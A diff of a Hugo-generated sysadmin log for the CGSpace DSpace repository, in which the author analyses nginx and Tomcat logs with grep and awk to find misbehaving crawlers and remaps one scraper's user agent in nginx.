</code></pre><ul>
<li>From looking at the requests, it appears these are from CIAT and CCAFS</li>
@ -382,11 +382,11 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>Ah, wait, it looks like <code>crawlerIps</code> only came in 2017-06, so probably isn&rsquo;t in Ubuntu 16.04&rsquo;s 7.0.68 build!</li>
<li>That would explain the errors I was getting when trying to set it:</li>
</ul>
<pre tabindex="0"><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property 'crawlerIps' to '190\.19\.92\.5|104\.196\.152\.243' did not find a matching property.
<pre tabindex="0"><code>WARNING: [SetPropertiesRule]{Server/Service/Engine/Host/Valve} Setting property &#39;crawlerIps&#39; to &#39;190\.19\.92\.5|104\.196\.152\.243&#39; did not find a matching property.
</code></pre><ul>
<li>As for now, it actually seems the CORE bot coming from 137.108.70.6 and 137.108.70.7 is only using a few sessions per day, which is good:</li>
</ul>
<pre tabindex="0"><code># grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)' dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
<pre tabindex="0"><code># grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=137.108.70.(6|7)&#39; dspace.log.2017-10-30 | sort -n | uniq -c | sort -h
410 session_id=74F0C3A133DBF1132E7EC30A7E7E0D60:ip_addr=137.108.70.7
574 session_id=5771742CABA3D0780860B8DA81E0551B:ip_addr=137.108.70.7
1012 session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A:ip_addr=137.108.70.6
@ -399,7 +399,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>Ask on the dspace-tech mailing list if it&rsquo;s possible to use an existing item as a template for a new item</li>
<li>To follow up on the CORE bot traffic, there were almost 300,000 requests yesterday:</li>
</ul>
<pre tabindex="0"><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h
139109 137.108.70.6
139253 137.108.70.7
</code></pre><ul>
@ -416,7 +416,7 @@ session_id=6C30F10B4351A4ED83EC6ED50AFD6B6A
<li>I&rsquo;m really starting to get annoyed with these guys, and thinking about blocking their IP address for a few days to see if CGSpace becomes more stable</li>
<li>Actually, come to think of it, they aren&rsquo;t even obeying <code>robots.txt</code>, because we actually disallow <code>/discover</code> and <code>/search-filter</code> URLs but they are hitting those massively:</li>
</ul>
<pre tabindex="0"><code># grep &quot;CORE/0.6&quot; /var/log/nginx/access.log | grep -o -E &quot;GET /(discover|search-filter)&quot; | sort -n | uniq -c | sort -rn
<pre tabindex="0"><code># grep &#34;CORE/0.6&#34; /var/log/nginx/access.log | grep -o -E &#34;GET /(discover|search-filter)&#34; | sort -n | uniq -c | sort -rn
158058 GET /discover
14260 GET /search-filter
</code></pre><ul>
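<li>The relevant stanza in our robots.txt looks roughly like this (paraphrased, not the verbatim file):</li>
</ul>
<pre tabindex="0"><code>User-agent: *
Disallow: /discover
Disallow: /search-filter
</code></pre>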
@ -15,7 +15,7 @@ The CORE developers responded to say they are looking into their bot not respect
Today there have been no hits by CORE and no alerts from Linode (coincidence?)
# grep -c &quot;CORE&quot; /var/log/nginx/access.log
# grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
Generate list of authors on CGSpace for Peter to go through and correct:
@ -40,7 +40,7 @@ The CORE developers responded to say they are looking into their bot not respect
Today there have been no hits by CORE and no alerts from Linode (coincidence?)
# grep -c &quot;CORE&quot; /var/log/nginx/access.log
# grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
Generate list of authors on CGSpace for Peter to go through and correct:
@ -48,7 +48,7 @@ Generate list of authors on CGSpace for Peter to go through and correct:
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -142,12 +142,12 @@ COPY 54701
<ul>
<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
</code></pre><ul>
<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
</code></pre><ul>
<li>Abenet asked if it would be possible to generate a report of items in Listing and Reports that had &ldquo;International Fund for Agricultural Development&rdquo; as the <em>only</em> investor</li>
@ -155,7 +155,7 @@ COPY 54701
<li>Work on making the thumbnails in the item view clickable</li>
<li>Basically, once you read the METS XML for an item it becomes easy to trace the structure to find the bitstream link</li>
</ul>
<pre tabindex="0"><code>//mets:fileSec/mets:fileGrp[@USE='CONTENT']/mets:file/mets:FLocat[@LOCTYPE='URL']/@xlink:href
<pre tabindex="0"><code>//mets:fileSec/mets:fileGrp[@USE=&#39;CONTENT&#39;]/mets:file/mets:FLocat[@LOCTYPE=&#39;URL&#39;]/@xlink:href
</code></pre><ul>
<li>METS XML is available for all items with this pattern: /metadata/handle/10568/95947/mets.xml</li>
<li>I whipped up a quick hack to print a clickable link with this URL on the thumbnail but it needs to check a few corner cases, like when there is a thumbnail but no content bitstream!</li>
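<li>As a quick sanity check one can pull that bitstream link straight out of the METS on the command line (a sketch, assuming curl and xmllint are available):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;https://cgspace.cgiar.org/metadata/handle/10568/95947/mets.xml&#39; \
  | xmllint --xpath &#34;string(//*[local-name()=&#39;fileGrp&#39;][@USE=&#39;CONTENT&#39;]//*[local-name()=&#39;FLocat&#39;]/@*[local-name()=&#39;href&#39;])&#34; -
</code></pre><ul>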
@ -177,7 +177,7 @@ COPY 54701
<li>It&rsquo;s the first time in a few days that this has happened</li>
<li>I had a look to see what was going on, but it isn&rsquo;t the CORE bot:</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/access.log | sort -n | uniq -c | sort -h | tail
306 68.180.229.31
323 61.148.244.116
414 66.249.66.91
@ -216,7 +216,7 @@ COPY 54701
<ul>
<li>But in the database the authors are correct (none with weird <code>, /</code> characters):</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like 'International Livestock Research Institute%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue value where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;International Livestock Research Institute%&#39;;
text_value | authority | confidence
--------------------------------------------+--------------------------------------+------------
International Livestock Research Institute | 8f3865dc-d056-4aec-90b7-77f49ab4735c | 0
@ -240,7 +240,7 @@ COPY 54701
<li>Tsega had to restart Tomcat 7 to fix it temporarily</li>
<li>I will start by looking at bot usage (access.log.1 includes usage until 6AM today):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log.1 | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log.1 | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
619 65.49.68.184
840 65.49.68.199
924 66.249.66.91
@ -268,11 +268,11 @@ COPY 54701
</code></pre><ul>
<li>This user is responsible for hundreds and sometimes thousands of Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
954
$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
6199
$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
7051
</code></pre><ul>
<li>The worst thing is that this user never specifies a user agent string so we can&rsquo;t lump it in with the other bots using the Tomcat Crawler Session Manager Valve</li>
@ -280,7 +280,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</ul>
<pre tabindex="0"><code># grep -c 104.196.152.243 /var/log/nginx/access.log.1
4681
# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P 'GET //?handle'
# grep 104.196.152.243 /var/log/nginx/access.log.1 | grep -c -P &#39;GET //?handle&#39;
4618
</code></pre><ul>
<li>I just realized that <code>ciat.cgiar.org</code> points to 104.196.152.243, so I should contact Leroy from CIAT to see if we can change their scraping behavior</li>
@ -288,44 +288,44 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</ul>
<pre tabindex="0"><code>$ grep -c 207.46.13.36 /var/log/nginx/access.log.1
2034
# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep 207.46.13.36 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next IP (157.55.39.161) also seems to be bingbot, and none of its requests are for URLs forbidden by robots.txt either:</li>
</ul>
<pre tabindex="0"><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
<pre tabindex="0"><code># grep 157.55.39.161 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
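<li>For what it&rsquo;s worth, the standard way to verify these really are Microsoft&rsquo;s crawlers is a reverse DNS lookup, which should resolve to a <code>search.msn.com</code> host, e.g.:</li>
</ul>
<pre tabindex="0"><code>$ host 207.46.13.36
</code></pre><ul>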
<li>The next few seem to be bingbot as well, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre tabindex="0"><code># grep -c -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1
5997
# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;bingbot&quot;
# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;bingbot&#34;
5988
# grep -E '207.46.13.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;207.46.13.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next few seem to be Googlebot, and they declare a proper user agent and do not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre tabindex="0"><code># grep -c -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1
3048
# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c Google
# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c Google
3048
# grep -E '66.249.66.[0-9]{2,3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;66.249.66.[0-9]{2,3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The next seems to be Yahoo, which declares a proper user agent and does not request dynamic URLs like &ldquo;/discover&rdquo;:</li>
</ul>
<pre tabindex="0"><code># grep -c 68.180.229.254 /var/log/nginx/access.log.1
1131
# grep 68.180.229.254 /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep 68.180.229.254 /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
0
</code></pre><ul>
<li>The last of the top ten IPs seems to be some bot with a weird user agent, but they are not behaving too well:</li>
</ul>
<pre tabindex="0"><code># grep -c -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1
2950
# grep -E '65.49.68.[0-9]{3}' /var/log/nginx/access.log.1 | grep -c &quot;GET /discover&quot;
# grep -E &#39;65.49.68.[0-9]{3}&#39; /var/log/nginx/access.log.1 | grep -c &#34;GET /discover&#34;
330
</code></pre><ul>
<li>Their user agents vary, i.e.:
@ -338,9 +338,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>I&rsquo;ll just keep an eye on that one for now, as it only made a few hundred requests to dynamic discovery URLs</li>
<li>While it&rsquo;s not in the top ten, Baidu is one bot that seems to not give a fuck:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;7/Nov/2017&quot; | grep -c Baiduspider
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep -c Baiduspider
8912
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;7/Nov/2017&quot; | grep Baiduspider | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;7/Nov/2017&#34; | grep Baiduspider | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
2521
</code></pre><ul>
<li>According to their documentation their bot <a href="http://www.baidu.com/search/robots_english.html">respects <code>robots.txt</code></a>, but I don&rsquo;t see this being the case</li>
@ -349,7 +349,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>I should look in nginx access.log, rest.log, oai.log, and DSpace&rsquo;s dspace.log.2017-11-07</li>
<li>Here are the top IPs making requests to XMLUI from 2 to 8 AM:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
279 66.249.66.91
373 65.49.68.199
446 68.180.229.254
@ -364,7 +364,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>Of those, most are Google, Bing, Yahoo, etc, except 63.143.42.244 and 63.143.42.242 which are Uptime Robot</li>
<li>Here are the top IPs making requests to REST from 2 to 8 AM:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
8 207.241.229.237
10 66.249.66.90
16 104.196.152.243
@ -377,14 +377,14 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>The OAI requests during that same time period are nothing to worry about:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E '07/Nov/2017:0[2-8]' | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#39;07/Nov/2017:0[2-8]&#39; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
1 66.249.66.92
4 66.249.66.90
6 68.180.229.254
</code></pre><ul>
<li>The top IPs from dspace.log during the 2 to 8 AM period:</li>
</ul>
<pre tabindex="0"><code>$ grep -E '2017-11-07 0[2-8]' dspace.log.2017-11-07 | grep -o -E 'ip_addr=[0-9.]+' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code>$ grep -E &#39;2017-11-07 0[2-8]&#39; dspace.log.2017-11-07 | grep -o -E &#39;ip_addr=[0-9.]+&#39; | sort -n | uniq -c | sort -h | tail
143 ip_addr=213.55.99.121
181 ip_addr=66.249.66.91
223 ip_addr=157.55.39.161
@ -414,9 +414,9 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>The whois data shows the IP is from China, but the user agent doesn&rsquo;t really give any clues:</li>
</ul>
<pre tabindex="0"><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F'&quot; ' '{print $3}' | sort | uniq -c | sort -h
210 &quot;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&quot;
22610 &quot;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&quot;
<pre tabindex="0"><code># grep 124.17.34.59 /var/log/nginx/access.log | awk -F&#39;&#34; &#39; &#39;{print $3}&#39; | sort | uniq -c | sort -h
210 &#34;Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36&#34;
22610 &#34;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/7.0; LCTE)&#34;
</code></pre><ul>
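<li>The country attribution came from a plain whois lookup, e.g.:</li>
</ul>
<pre tabindex="0"><code>$ whois 124.17.34.59 | grep -i country
</code></pre><ul>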
<li>A Google search for &ldquo;LCTE bot&rdquo; doesn&rsquo;t return anything interesting, but this <a href="https://stackoverflow.com/questions/42500881/what-is-lcte-in-user-agent">Stack Overflow discussion</a> references the lack of information</li>
<li>So basically after a few hours of looking at the log files I am not closer to understanding what is going on!</li>
@ -424,7 +424,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
<li>And as we speak Linode alerted that the outbound traffic rate is very high for the past two hours (about 12 to 14 hours)</li>
<li>At least for now it seems to be that new Chinese IP (124.17.34.59):</li>
</ul>
<pre tabindex="0"><code># grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
198 207.46.13.103
203 207.46.13.80
205 207.46.13.36
@ -438,17 +438,17 @@ $ grep 104.196.152.243 dspace.log.2017-11-01 | grep -o -E 'session_id=[A-Z0-9]{3
</code></pre><ul>
<li>Seems 124.17.34.59 is really downloading all our PDFs, compared to the next top active IPs during this time!</li>
</ul>
<pre tabindex="0"><code># grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
<pre tabindex="0"><code># grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 124.17.34.59 | grep -c pdf
5948
# grep -E &quot;07/Nov/2017:1[234]:&quot; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
# grep -E &#34;07/Nov/2017:1[234]:&#34; /var/log/nginx/access.log | grep 104.196.152.243 | grep -c pdf
0
</code></pre><ul>
<li>About CIAT, I think I need to encourage them to specify a user agent string for their requests, because they are not reusing their Tomcat session and they are creating thousands of sessions per day</li>
<li>All CIAT requests vs unique ones:</li>
</ul>
<pre tabindex="0"><code>$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | wc -l
<pre tabindex="0"><code>$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | wc -l
3506
$ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-11-07 | sort | uniq | wc -l
$ grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243&#39; dspace.log.2017-11-07 | sort | uniq | wc -l
3506
</code></pre><ul>
<li>I emailed CIAT about the session issue, user agent issue, and told them they should not scrape the HTML contents of communities, instead using the REST API</li>
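<li>Something like this would be much cheaper for everyone, with a descriptive agent and paging through the REST API (a sketch with a made-up collection ID and agent string):</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &#39;User-Agent: CIAT-harvester/1.0&#39; &#39;https://cgspace.cgiar.org/rest/collections/1179/items?limit=100&amp;offset=0&#39;
</code></pre>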
@ -459,18 +459,18 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<ul>
<li>But they literally just made this request today:</li>
</ul>
<pre tabindex="0"><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &quot;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&quot; 200 82265 &quot;-&quot; &quot;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&quot;
<pre tabindex="0"><code>180.76.15.136 - - [07/Nov/2017:06:25:11 +0000] &#34;GET /discover?filtertype_0=crpsubject&amp;filter_relational_operator_0=equals&amp;filter_0=WATER%2C+LAND+AND+ECOSYSTEMS&amp;filtertype=subject&amp;filter_relational_operator=equals&amp;filter=WATER+RESOURCES HTTP/1.1&#34; 200 82265 &#34;-&#34; &#34;Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)&#34;
</code></pre><ul>
<li>Along with another thousand or so requests to URLs that are forbidden in robots.txt today alone:</li>
</ul>
<pre tabindex="0"><code># grep -c Baiduspider /var/log/nginx/access.log
3806
# grep Baiduspider /var/log/nginx/access.log | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# grep Baiduspider /var/log/nginx/access.log | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
1085
</code></pre><ul>
<li>I will think about blocking their IPs but they have 164 of them!</li>
</ul>
<pre tabindex="0"><code># grep &quot;Baiduspider/2.0&quot; /var/log/nginx/access.log | awk '{print $1}' | sort -n | uniq | wc -l
<pre tabindex="0"><code># grep &#34;Baiduspider/2.0&#34; /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort -n | uniq | wc -l
164
</code></pre><h2 id="2017-11-08">2017-11-08</h2>
<ul>
@ -478,12 +478,12 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
<li>Linode sent another alert about CPU usage in the morning at 6:12AM</li>
<li>Jesus, the new Chinese IP (124.17.34.59) has downloaded 24,000 PDFs in the last 24 hours:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;0[78]/Nov/2017:&quot; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;0[78]/Nov/2017:&#34; | grep 124.17.34.59 | grep -v pdf.jpg | grep -c pdf
24981
</code></pre><ul>
<li>This is about 20,000 Tomcat sessions:</li>
</ul>
<pre tabindex="0"><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat dspace.log.2017-11-07 dspace.log.2017-11-08 | grep -Io -E &#39;session_id=[A-Z0-9]{32}:ip_addr=124.17.34.59&#39; | sort | uniq | wc -l
20733
</code></pre><ul>
<li>I&rsquo;m getting really sick of this</li>
@ -498,7 +498,7 @@ $ grep -Io -E 'session_id=[A-Z0-9]{32}:ip_addr=104.196.152.243' dspace.log.2017-
</ul>
<pre tabindex="0"><code>map $remote_addr $ua {
# 2017-11-08 Random Chinese host grabbing 20,000 PDFs
124.17.34.59 'ChineseBot';
124.17.34.59 &#39;ChineseBot&#39;;
default $http_user_agent;
}
</code></pre><ul>
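<li>The remapped value is then sent upstream to Tomcat in place of the original header; this one-liner is what makes the map effective:</li>
</ul>
<pre tabindex="0"><code>proxy_set_header User-Agent $ua;
</code></pre><ul>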
@ -516,9 +516,9 @@ proxy_set_header User-Agent $ua;
<li>I merged the clickable thumbnails code to <code>5_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/347">#347</a>) and will deploy it later along with the new bot mapping stuff (and re-run the Ansible <code>nginx</code> and <code>tomcat</code> tags)</li>
<li>I was thinking about Baidu again and decided to see how many requests they have versus Google to URL paths that are explicitly forbidden in <code>robots.txt</code>:</li>
</ul>
<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
<pre tabindex="0"><code># zgrep Baiduspider /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
22229
# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &quot;GET /(browse|discover|search-filter)&quot;
# zgrep Googlebot /var/log/nginx/access.log* | grep -c -E &#34;GET /(browse|discover|search-filter)&#34;
0
</code></pre><ul>
<li>It seems that they rarely even bother checking <code>robots.txt</code>, but Google does multiple times per day!</li>
@ -538,20 +538,20 @@ proxy_set_header User-Agent $ua;
<ul>
<li>Awesome, it seems my bot mapping stuff in nginx actually reduced the number of Tomcat sessions used by the CIAT scraper today, total requests and unique sessions:</li>
</ul>
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '09/Nov/2017' | grep -c 104.196.152.243
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;09/Nov/2017&#39; | grep -c 104.196.152.243
8956
$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-09 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
223
</code></pre><ul>
<li>Versus the same stats for yesterday and the day before:</li>
</ul>
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep '08/Nov/2017' | grep -c 104.196.152.243
<pre tabindex="0"><code># zcat -f -- /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep &#39;08/Nov/2017&#39; | grep -c 104.196.152.243
10216
$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-08 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2592
# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep '07/Nov/2017' | grep -c 104.196.152.243
# zcat -f -- /var/log/nginx/access.log.2.gz /var/log/nginx/access.log.3.gz | grep &#39;07/Nov/2017&#39; | grep -c 104.196.152.243
8120
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
3506
</code></pre><ul>
<li>The number of sessions is over <em>ten times less</em>!</li>
@ -569,7 +569,7 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
<li>Update the <a href="https://github.com/ilri/rmg-ansible-public">Ansible infrastructure templates</a> to be a little more modular and flexible</li>
<li>Looking at the top client IPs on CGSpace so far this morning, even though it&rsquo;s only been eight hours:</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &quot;12/Nov/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#34;12/Nov/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
243 5.83.120.111
335 40.77.167.103
424 66.249.66.91
@ -584,21 +584,21 @@ $ grep 104.196.152.243 dspace.log.2017-11-07 | grep -o -E 'session_id=[A-Z0-9]{3
<li>5.9.6.51 seems to be a Russian bot:</li>
</ul>
